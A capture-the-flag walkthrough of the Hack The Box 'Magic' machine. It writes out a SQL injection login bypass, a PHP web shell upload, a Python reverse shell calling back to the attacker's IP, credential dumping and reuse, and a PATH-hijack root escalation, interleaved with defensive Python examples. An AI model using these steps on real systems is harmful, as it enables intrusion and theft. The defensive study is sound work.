Hack The Box - Magic
Enumeration
- Only two ports are open:
nmap -A -T5 -Pn -oN initial-nmap-scan 10.10.10.185
# Nmap 7.80 scan initiated Sat Apr 18 22:30:30 2020 as: nmap -A -T5 -Pn -oN initial-nmap-scan 10.10.10.185
Warning: 10.10.10.185 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.10.10.185
Host is up (0.048s latency).
Not shown: 971 closed ports, 27 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 06:d4:89:bf:51:f7:fc:0c:f9:08:5e:97:63:64:8d:ca (RSA)
| 256 11:a6:92:98:ce:35:40:c7:29:09:4f:6c:2d:74:aa:66 (ECDSA)
|_ 256 71:05:99:1f:a8:1b:14:d6:03:85:53:f8:78:8e:cb:88 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Magic Portfolio
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Apr 18 22:30:44 2020 -- 1 IP address (1 host up) scanned in 14.23 seconds
- The page at http://10.10.10.185 shows an image catalog. It also mentions that you need to log in to upload images.
- Images are served from a static folder, e.g. http://10.10.10.185/images/uploads/*.jpeg
- Scanned the box with gobuster and discovered a few other pages:
gobuster dir -u http://10.10.10.185/ -x php -w /usr/share/dirbuster/directory-list-2.3-medium.txt -t 200 -o initial-gobuster-scan
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.10.185/
[+] Threads: 200
[+] Wordlist: /usr/share/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: php
[+] Timeout: 10s
===============================================================
2020/09/06 12:14:25 Starting gobuster
===============================================================
/images (Status: 301)
/assets (Status: 301)
/upload.php (Status: 302)
/logout.php (Status: 302)
/login.php (Status: 200)
/index.php (Status: 200)
/server-status (Status: 403)
Foothold
- Back to http://10.10.10.185/login.php and try SQLi:
username: ' or 1=1; -- -
password: ' or 1=1; -- -
- And we got in! The page redirected to http://10.10.10.185/upload.php, but trying to upload any web shell failed with the alert: “Sorry, only JPG, JPEG & PNG files are allowed.”
- We need to get around this. Get the PHP shell from https://github.com/jgor/php-jpeg-shell/raw/master/shell.php, rename it to shell.php.png, and the upload completes without any complaints. Nice!
- From the main page review we know the upload folder location: http://10.10.10.185/images/uploads/. Opening http://10.10.10.185/images/uploads/shell.php.png shows a command input ready to execute.
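The upload step above succeeds because of two separate weaknesses: the filter only looks at the trailing extension, and the web server still hands `shell.php.png` to the PHP interpreter (otherwise the command input would never render). The Python below is an added illustration, not the portfolio's own PHP code: it shows the suffix-only check beside a validator that requires exactly one extension, checks the magic bytes against that extension, refuses bodies carrying a PHP open tag, and stores the file under a server-chosen name. The signature table and the size limit are assumptions.

```python
"""Added example (not the portfolio's own PHP): suffix-only check beside a
stricter upload validator.  Signature table and size limit are assumptions."""
import os
import secrets

# Magic bytes for the formats the site says it accepts.
SIGNATURES = {
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
}


def weak_is_allowed(filename):
    """Suffix-only check like the alert suggests: 'shell.php.png' ends in png, so it passes."""
    return filename.lower().rsplit(".", 1)[-1] in SIGNATURES


def validate_upload(filename, content, max_bytes=5 * 1024 * 1024):
    """Return (ok, reason, stored_name).

    Rejects names with more or fewer than one extension, extensions outside
    the allow-list, oversize bodies, bodies whose magic bytes disagree with
    the extension, and bodies containing a PHP open tag.  Accepted files get
    a random server-chosen name so the client's filename never reaches disk.
    """
    parts = os.path.basename(filename).lower().split(".")
    if len(parts) != 2 or not parts[0]:
        return False, "exactly one extension is required", None
    ext = parts[1]
    if ext not in SIGNATURES:
        return False, "extension ." + ext + " is not allowed", None
    if len(content) > max_bytes:
        return False, "file too large", None
    if not content.startswith(SIGNATURES[ext]):
        return False, "content does not match extension", None
    if b"<?php" in content or b"<?=" in content:
        return False, "embedded PHP open tag", None
    stored_name = secrets.token_hex(16) + "." + ext
    return True, "ok", stored_name
```

On its own the validator is not sufficient: a well-formed JPEG can still carry a PHP tag inside its metadata, so the decisive control is that nothing under images/uploads/ is ever executed, for example `php_admin_flag engine off` in a `<Directory>` block for that path together with a PHP handler that matches `\.php$` only.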
- Start a listener:
nc -lnvp 4444
- Execute reverse shell from WEB PHP shell:
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.14",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
- And we got a shell!
www-data@ubuntu:~/Magic/images/uploads$ ls -la
ls -la
total 7400
drwxr-xr-x 2 www-data www-data 4096 Apr 18 12:40 .
drwxr-xr-x 4 www-data www-data 4096 Apr 14 05:04 ..
-rw-r--r-- 1 www-data www-data 5289209 Oct 22 00:44 7.jpg
-rw-r--r-- 1 www-data www-data 1455770 Oct 22 01:02 giphy.gif
-rw-r--r-- 1 www-data www-data 25290 Apr 18 12:07 kibers.png
-rw-r--r-- 1 www-data www-data 124278 Oct 22 01:01 logo.png
-rw-r--r-- 1 www-data www-data 100328 Oct 22 01:01 magic-1424x900.jpg
-rw-r--r-- 1 www-data www-data 37787 Oct 22 01:01 magic-hat_23-2147512156.jpg
-rw-r--r-- 1 www-data www-data 71417 Apr 18 12:39 magic-stwand.jpg
-rw-r--r-- 1 www-data www-data 67973 Oct 22 01:01 magic-wand.jpg
-rw-r--r-- 1 www-data www-data 8 Apr 18 12:30 r.png
-rw-r--r-- 1 www-data www-data 192 Apr 18 12:40 shell.php.png
-rw-r--r-- 1 www-data www-data 192 Apr 18 12:23 shell.png
-rw-r--r-- 1 root root 361568 Apr 14 04:56 trx.jpg
www-data@ubuntu:~/Magic/images/uploads$
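From the defender's side, the chain above leaves a recognisable process tree: a www-data child of apache2 launches python3, which in turn launches /bin/sh. The Python below is an added example, not something from the box, that flags that pattern over constructed lines in the shape of `ps -eo user,ppid,pid,args` output; the account, server and interpreter lists are assumptions to tune per host.

```python
"""Added example over constructed process lines: flag a web server account
that spawns an interpreter or shell somewhere below the web server process."""
import os

SERVICE_ACCOUNTS = {"www-data", "apache", "nginx"}           # assumed
WEB_SERVERS = {"apache2", "httpd", "nginx", "php-fpm"}       # assumed
INTERPRETERS = {"sh", "bash", "dash", "python", "python3",
                "perl", "php", "nc", "ncat"}                  # assumed

# Constructed sample in `ps -eo user,ppid,pid,args` layout (not a real capture).
SAMPLE_PS = """\
root      1     1187 /usr/sbin/apache2 -k start
www-data  1187  1190 /usr/sbin/apache2 -k start
www-data  1190  2345 python3 -c import socket,subprocess,os
www-data  2345  2346 /bin/sh -i
theseus   1     3000 -bash
www-data  1190  2400 /usr/sbin/apache2 -k start
"""


def parse_ps(text):
    """Map pid -> {user, ppid, pid, args}."""
    procs = {}
    for line in text.splitlines():
        if not line.strip():
            continue
        user, ppid, pid, args = line.split(None, 3)
        procs[int(pid)] = {"user": user, "ppid": int(ppid), "pid": int(pid), "args": args}
    return procs


def comm(args):
    """Program name from an args string: basename, login-shell dash stripped."""
    return os.path.basename(args.split()[0]).lstrip("-")


def descends_from_web_server(proc, procs, max_depth=16):
    """True if any ancestor (up to max_depth) is a web server process."""
    current = proc
    for _ in range(max_depth):
        parent = procs.get(current["ppid"])
        if parent is None:
            return False
        if comm(parent["args"]) in WEB_SERVERS:
            return True
        current = parent
    return False


def detect(text):
    """Return [(pid, program)] for interpreters run by a service account under a web server."""
    procs = parse_ps(text)
    findings = []
    for proc in procs.values():
        name = comm(proc["args"])
        if (name in INTERPRETERS and proc["user"] in SERVICE_ACCOUNTS
                and descends_from_web_server(proc, procs)):
            findings.append((proc["pid"], name))
    return findings
```

The same rule expressed against an EDR or auditd execve stream is what would have fired at the moment the reverse shell connected; the apache2 workers themselves are not flagged because their program name is not an interpreter.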
Getting user
- From the /var/www/Magic/db.php5 file we got MySQL credentials:
<?php
class Database
{
private static $dbName = 'Magic' ;
private static $dbHost = 'localhost' ;
private static $dbUsername = 'theseus';
private static $dbUserPassword = 'iamkingtheseus';
- Using these credentials it’s possible to create a MySQL dump (the password must follow -p without a space, otherwise mysqldump prompts for it and treats the value as a database name):
mysqldump --databases Magic -u theseus -p'iamkingtheseus' > magic.sql
- From the SQL dump we got the admin credentials:
LOCK TABLES `login` WRITE;
/*!40000 ALTER TABLE `login` DISABLE KEYS */;
INSERT INTO `login` VALUES (1,'admin','Th3s3usW4sK1ng');
/*!40000 ALTER TABLE `login` ENABLE KEYS */;
UNLOCK TABLES;
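The login bypass in the Foothold section works because the username and password are spliced into the SQL text, and the dump above shows the second problem: the `login` table holds the admin password in clear text. The Python below is an added example, not the portfolio's PHP, covering both: a string-built query that the `' or 1=1; -- -` input satisfies, beside a parameterised lookup over a table that stores a salted PBKDF2 hash and compares it in constant time. The column names, the iteration count and the in-memory sqlite3 database are assumptions.

```python
"""Added example (not the portfolio's PHP): concatenated login query beside a
parameterised one over hashed passwords.  Schema and iteration count assumed."""
import hashlib
import hmac
import os
import sqlite3

ITERATIONS = 600_000  # assumed policy; raise as hardware allows


def hash_password(password, salt=None):
    """Salted PBKDF2-HMAC-SHA256, stored as '<salt hex>$<digest hex>'."""
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return salt.hex() + "$" + digest.hex()


def verify_password(password, stored):
    """Recompute with the stored salt and compare without short-circuiting."""
    salt_hex, digest_hex = stored.split("$", 1)
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                    bytes.fromhex(salt_hex), ITERATIONS)
    return hmac.compare_digest(candidate.hex(), digest_hex)


# Compared against when the username is unknown, so an unknown user costs the
# same time as a wrong password and does not reveal which usernames exist.
DUMMY_HASH = hash_password("")


def make_db(username, password, hashed):
    """In-memory stand-in for the `login` table (constructed, not the dump)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE login (id INTEGER PRIMARY KEY, "
               "username TEXT UNIQUE, password TEXT)")
    db.execute("INSERT INTO login (username, password) VALUES (?, ?)",
               (username, hash_password(password) if hashed else password))
    return db


def login_vulnerable(db, username, password):
    """Query text built from user input; the clear-text password is compared in SQL."""
    query = ("SELECT username FROM login WHERE username='" + username
             + "' AND password='" + password + "'")
    return db.execute(query).fetchone() is not None


def login_hardened(db, username, password):
    """Bound parameter for the lookup; the password is verified in code against the hash."""
    row = db.execute("SELECT password FROM login WHERE username = ?",
                     (username,)).fetchone()
    stored = row[0] if row else DUMMY_HASH
    return verify_password(password, stored) and row is not None
```

With the parameterised query the whole `' or 1=1; -- -` string is bound as a literal username, so it simply matches no row; and even a full dump of the hardened table yields salted hashes rather than a password that can be reused for `su`, as it is later in this writeup.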
- Try reusing this password for the user:
www-data@ubuntu:/dev/shm$ su theseus
su theseus
Password: Th3s3usW4sK1ng
theseus@ubuntu:~$ cat user.txt
cat user.txt
b0fdfe563dc8c153cebf91eab51166c2
theseus@ubuntu:~$ pwd
pwd
/home/theseus
theseus@ubuntu:~$ ls -la
ls -la
total 84
drwxr-xr-x 15 theseus theseus 4096 Apr 16 02:58 .
drwxr-xr-x 3 root root 4096 Oct 15 2019 ..
lrwxrwxrwx 1 theseus theseus 9 Oct 21 03:26 .bash_history -> /dev/null
-rw-r--r-- 1 theseus theseus 220 Oct 15 2019 .bash_logout
-rw-r--r-- 1 theseus theseus 15 Oct 21 03:25 .bash_profile
-rw-r--r-- 1 theseus theseus 3771 Oct 15 2019 .bashrc
drwxrwxr-x 13 theseus theseus 4096 Mar 13 05:57 .cache
drwx------ 13 theseus theseus 4096 Oct 22 03:30 .config
drwxr-xr-x 2 theseus theseus 4096 Oct 22 03:28 Desktop
drwxr-xr-x 2 theseus theseus 4096 Oct 22 03:28 Documents
drwxr-xr-x 2 theseus theseus 4096 Oct 22 03:28 Downloads
drwx------ 3 theseus theseus 4096 Oct 21 03:49 .gnupg
-rw------- 1 theseus theseus 7334 Apr 15 23:50 .ICEauthority
drwx------ 3 theseus theseus 4096 Oct 21 03:49 .local
drwxr-xr-x 2 theseus theseus 4096 Oct 22 03:28 Music
drwxr-xr-x 2 theseus theseus 4096 Oct 22 03:28 Pictures
drwxr-xr-x 2 theseus theseus 4096 Oct 22 03:28 Public
drwx------ 2 theseus theseus 4096 Oct 21 07:31 .ssh
drwxr-xr-x 2 theseus theseus 4096 Oct 22 03:28 Templates
-r-------- 1 theseus theseus 33 Apr 18 03:59 user.txt
drwxr-xr-x 2 theseus theseus 4096 Oct 22 03:28 Videos
Privilege escalation
- We have a non-default SUID file:
theseus@ubuntu:~$ ls -la /bin/sysinfo
-rwsr-x--- 1 root users 22040 Oct 21 03:45 /bin/sysinfo
- And we are in the right group to run it:
theseus@ubuntu:~$ id theseus
uid=1000(theseus) gid=1000(theseus) groups=1000(theseus),100(users)
- Running it with ltrace revealed that the free command is invoked without its full path, so we can try to control which binary gets executed:
- Create a custom file:
theseus@ubuntu:/dev/shm$ cat free
#!/bin/sh
cat /root/root.txt
mkdir /root/.ssh
cat /home/theseus/.ssh/authorized_keys >> /root/.ssh/authorized_keys
- Make it executable:
theseus@ubuntu:/dev/shm$ chmod +x free
- Adjust PATH variable:
theseus@ubuntu:~$ export PATH=/dev/shm:$PATH
- Running sysinfo prints root’s hash and also copies our SSH key to root’s location.
- SSH in as root:
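The escalation works because sysinfo runs as root but resolves `free` through the caller's PATH. The Python below is an added example, not the binary's code, that shows how the bare name resolves once a writable directory is prepended, flags PATH entries the caller can write to, and builds the fixed environment a privileged helper should exec with. TRUSTED_PATH and the temporary directory standing in for /dev/shm are assumptions.

```python
"""Added example (not the box's sysinfo): PATH resolution of a bare command
name, an audit for writable PATH entries, and a fixed environment for
privileged helpers.  TRUSTED_PATH and the temp dir are assumptions."""
import os
import shutil
import tempfile

TRUSTED_PATH = "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"  # assumed


def resolve_command(name, path_value):
    """Which file a bare command name maps to under the given PATH (None if absent)."""
    return shutil.which(name, path=path_value)


def writable_path_entries(path_value):
    """PATH entries the current user can write to; each one is a hijack point."""
    return [d for d in path_value.split(os.pathsep) if d and os.access(d, os.W_OK)]


def hardened_env():
    """Environment a privileged helper should exec with: fixed PATH, nothing
    inherited except a small allow-list (no LD_*, no caller PATH)."""
    env = {k: v for k, v in os.environ.items() if k in ("LANG", "TERM")}
    env["PATH"] = TRUSTED_PATH
    return env


def demo():
    """Plant a fake `free` in a writable dir (stands in for /dev/shm) and compare
    what the caller's PATH resolves to with what the hardened PATH resolves to."""
    with tempfile.TemporaryDirectory() as shm:
        fake = os.path.join(shm, "free")
        with open(fake, "w") as f:
            f.write("#!/bin/sh\necho not the real free\n")
        os.chmod(fake, 0o755)
        caller_path = shm + os.pathsep + TRUSTED_PATH   # like export PATH=/dev/shm:$PATH
        hijacked = resolve_command("free", caller_path)
        trusted = resolve_command("free", hardened_env()["PATH"])
        return {
            "hijacked_to_fake": hijacked == fake,
            "writable_entry_flagged": shm in writable_path_entries(caller_path),
            "hardened_ignores_fake": trusted != fake,
            "env_path_fixed": hardened_env()["PATH"] == TRUSTED_PATH,
        }
```

For the helper itself the fix is to call /usr/bin/free by absolute path, or to execve with the fixed environment above; `writable_path_entries` is the check an audit script would run against the PATH a setuid program inherits from its caller.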
ssh -i id_rsa.pub root@10.10.10.185
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 5.3.0-42-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
29 packages can be updated.
0 updates are security updates.
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Your Hardware Enablement Stack (HWE) is supported until April 2023.
Last login: Sat Apr 18 14:47:23 2020 from 10.10.14.14
root@ubuntu:~# cat root.txt
392e6cbdbbb527970f14098612325fe7
root@ubuntu:~#